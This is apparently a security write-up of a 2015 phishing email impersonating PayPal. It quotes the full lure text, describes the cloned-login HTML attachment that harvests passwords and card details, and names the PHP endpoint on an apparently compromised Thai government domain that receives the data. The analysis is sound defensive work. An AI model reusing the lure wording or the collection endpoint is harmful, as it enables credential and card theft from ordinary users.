Date: Jul 23, 2015 11:52:43 AM
From:“PayPal.com” <intl@lapyap.com>
To: *undisclosed recipients
Reply To: “PayPal.com” <intl@lapyap.com>
Subject: As a result we have temporarily suspended your account.
We have been given reason to believe that there maybe some question as to the authenticity of the information that you have uploaded to PayPal.com, or that you do not have permission/rights to modify them.
As a result we have temporarily suspended your account. You will note that our Terms of Use about your details or personal informations for to remove question that this action will be taken. You accepted these terms when you registered.
So that you may continue to enjoy the benefits that PayPal.com provides, would you be so kind as to confirm the following items via:
1. Download the attached document and open it in a secure browser.
2. Follow the verification process and give us your correct information.
The purpose of this verification is to confirm that you are the person who registered the account.
Accordingly the details you send must be correct, so that we can identify you.
Unfortunately we will not enter in to any further correspondence regarding the suspension of your profile until these items have been received and subsequent verification has taken place. It is regrettable that we have been given cause to take this action but will hope that you will agree that the success of the site and it’s advertisers is dependent on the authenticity of it’s advertisers.
Please DO NOT REPLY to this email as they will not be read. Please consult the Knowledge Base for further information.
With kind regards
The PayPal.com Team
The Attachment
This phishing email includes a attachment which is a html file. Upon opening the html file in an internet browser it opens a page which is replicated version of paypal’s website. The page asks for personal information and information about victim’s credit card credentials.
Overall Analysis
This email is a phishing attack targeting paypal users. The email tells the victim that he/she has a problem with the paypal account and tells them to verify their information through the attachment that they send. The attachment collects the victims personal information, paypal password and credit card credentials and sends them to the attackers. The information collected is sent to a php service located at http://narathiwat.nfe.go.th/htaccess.php.
Analysis of the Link
Domain: NFE.GO.TH
Registrar: T.H.NIC Co., Ltd.
Name Server: NS.JI-NET.COM
Name Server: NS2.JI-NET.COM
Status: ACTIVE
Updated date: 5 Feb 2015
Created date: 5 Nov 2007
Renew date: 17 Jan 2015
Exp date: 16 Jan 2016
Domain Holder: Nonformal Education Department
Ministry of Education, Rajadamneon Ave. Dusit, Bangkok
10300
TH
Tech Contact: 44731
Jasmine Internet Co., Ltd.
200 Moo 4, Chaengwatana Rd.,Pakkred, Nonthaburi
11120
TH
The website is located in Thailand and has no relation with paypal. And this is the main page of the domain that the information is sent to.
